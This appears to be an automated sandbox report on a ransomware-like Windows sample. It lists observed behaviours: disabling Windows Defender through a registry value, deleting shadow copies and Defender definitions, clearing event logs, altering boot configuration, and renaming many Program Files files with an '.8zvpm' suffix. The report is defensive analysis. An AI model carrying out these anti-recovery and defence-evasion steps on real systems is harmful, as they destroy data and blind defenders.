Analysis Overview
SHA256
d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d
Threat Level: Known bad
The file cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Interacts with shadow copies
Suspicious use of WriteProcessMemory
Runs net.exe
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 19:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 19:37
Reported
2022-01-12 19:42
Platform
win7-en-20211208
Max time kernel
70s
Max time network
19s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SmnB7SJfbgM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Paper.eftx.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SCVjS_SUHmc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_QSIyA9OrOrc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0Scc7RX9iWo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_PHbZzK3FX480.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_zdyceR9rjt40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0aX4uUpandY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageStyle.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_TQsmL1HD9Rw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_TjmocohHRaY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\URBAN_01.MID.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_jtVUgXbr3nk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_T2f1YTnh7Vo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_V0iNF7Xuy4o0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_fT96kQSn-vM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR12F.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_A3euzVqq1Fg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_rVj01KEl7Dc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_athj58JoGUE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FBXa0bENIu40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FCqVyLaojd80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_YHkKzVPIN1I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_nu3S3dfdZB00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SMD432Qu-ak0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_CPLnX4BhkuQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_cemJP_srwg00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_tUax988JXcY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7S8RCYjYjiw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_evcSqRAcDvI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_ki1z2DLWmTA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TextConv\Wks9Pxy.cnv.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_Z9Xk-AfS86c0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_GppLoEuKDKs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_8B0I7jiiXj00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7KY_OPnWAaQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\ShvlRes.dll.mui.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_2HMAyB-0Lgk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_Fprr37D_N440.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7LIJjfYbKaw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_KwBppXFmtS40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_DSb1W5lWS6w0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_60gHKunfb340.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_fUpF3aUXOFc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\Templates\Genko_2.jtp | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SpjqgTyHBZs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FdcJmx7Y2U40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_ekWVFheNPVQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_BbqsYLdFs180.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_VOy-VR2Iso40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18202_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_uOcZk-ANPcc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_---grD_fTEc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_3hpk6qUUMWY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_v8Nfnzrqe5E0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Riga.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_QZVDEoZAMEY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SaZCMITig1I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_2TjSCvsIuUw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_1iJ3e5SRMqo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\es-ES\Hearts.exe.mui.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_q4ULK1bt1o40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
